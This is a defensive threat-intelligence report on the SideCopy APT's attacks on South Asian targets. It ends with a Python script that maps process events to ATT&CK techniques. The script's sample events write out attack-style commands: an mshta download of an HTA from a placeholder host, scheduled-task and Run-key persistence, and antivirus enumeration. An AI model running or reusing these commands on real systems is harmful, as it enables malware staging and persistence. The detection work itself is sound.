EXECUTIVE SUMMARY
A malicious website linked to the SideCopy APT group has been uncovered, revealing a sophisticated threat targeting South Asian nations, particularly India. This group employs various tactics, including the use of malicious LNK files and complex infection chains, to compromise systems. Of particular concern is their focus on university students, potentially intersecting with other APT groups like Transparent Tribe.
The SideCopy APT group initiates its attacks through spam emails containing links to malicious archive files. Upon execution, these files trigger a sequence of events, including the download and execution of HTA files, leading to the deployment of malware payloads like Reverse RAT and Action RAT. The malware utilizes various techniques for persistence and evasion, adapting its behavior based on the presence of antivirus software. Furthermore, the group leverages PHP files on the malicious website to tailor attacks based on the victim's operating system.
The emergence of SideCopy poses a significant threat, especially to entities in South Asia, notably targeting India. Their intricate attack methods underscore the need for robust cybersecurity measures. Collaboration and information sharing are vital for understanding and mitigating the evolving threat landscape posed by groups like SideCopy and their potential intersections with other threat actors. Vigilance, adaptive defenses, and proactive response strategies are essential in safeguarding against such persistent threats.
THREAT PROFILE:
| Tactic | Technique Id | Technique |
|---|---|---|
| Execution | T1059 | Command and Scripting Interpreter |
| Execution | T1053 | Scheduled Task/Job |
| Execution | T1047 | Windows Management Instrumentation |
| Persistence | T1547 | Boot or Logon Autostart Execution |
| Privilege Escalation | T1574 | Hijack Execution Flow |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
| Defense Evasion | T1112 | Modify Registry |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Discovery | T1518 | Software Discovery |
| Command and Control | T1071 | Application Layer Protocol |
| Command and Control | T1105 | Ingress Tool Transfer |
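The infection chain described in the summary (LNK file, HTA download and execution, persistence, antivirus checks) and the technique IDs in the threat profile above can be turned into simple process-creation detections. The following Python is an added example written for this page, not code from the report or from any vendor; it maps constructed Sysmon-style process events onto four of the listed technique IDs (T1059, T1053, T1547, T1518). The event shape, the rule predicates and the sample command lines are assumptions made for illustration, and the URL host is a placeholder.

```python
"""Map process-creation events onto ATT&CK technique IDs from the threat profile.

Added example; the event format and sample events below are constructed, not
taken from the report.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    technique_id: str
    description: str
    command_line: str


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def _base(path: str) -> str:
    """Lower-cased file name of an image path, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# T1059: an HTA pulled from a remote URL via mshta.exe, the "download and
# execute HTA" step of the chain. A parent of explorer.exe is consistent with a
# user double-clicking a shortcut (LNK) file.
def _mshta_remote(e: ProcEvent) -> bool:
    return _base(e.image) == "mshta.exe" and URL_RE.search(e.command_line) is not None


# T1053: scheduled task creation used for persistence.
def _scheduled_task(e: ProcEvent) -> bool:
    return _base(e.image) == "schtasks.exe" and "/create" in e.command_line.lower()


# T1547: autostart entry written under a CurrentVersion\Run key.
def _run_key(e: ProcEvent) -> bool:
    cl = e.command_line.lower()
    return _base(e.image) == "reg.exe" and " add " in cl and r"\currentversion\run" in cl


# T1518: enumerating installed antivirus products, the "adapts its behaviour
# based on the presence of antivirus software" step.
def _av_discovery_wmi(e: ProcEvent) -> bool:
    return _base(e.image) == "wmic.exe" and "antivirusproduct" in e.command_line.lower()


RULES = (
    ("T1059", "HTA fetched from a remote URL via mshta.exe", _mshta_remote),
    ("T1053", "Scheduled task created with schtasks.exe", _scheduled_task),
    ("T1547", "Run-key autostart entry written with reg.exe", _run_key),
    ("T1518", "Antivirus product enumeration via WMI", _av_discovery_wmi),
)


def detect(events) -> list:
    """Return one Finding per (event, rule) match, in event order."""
    findings = []
    for e in events:
        for technique_id, description, predicate in RULES:
            if predicate(e):
                findings.append(Finding(technique_id, description, e.command_line))
    return findings


# Constructed sample events (hypothetical paths and a placeholder host).
SAMPLE_EVENTS = (
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://placeholder.invalid/stage.hta"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\svc.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svc /d C:\Users\Public\svc.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
              r"wmic.exe /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"),
    # Benign activity that must not match any rule.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),
)


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.technique_id}: {f.description} <- {f.command_line}")
```

Each rule is deliberately narrow so that the mapping to a technique ID stays explicit; in production these would be joined with parent-process context (for instance, mshta.exe spawned by explorer.exe shortly after a .lnk open) and with the network telemetry for the HTA download.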
REFERENCES:
The following reports contain further technical details: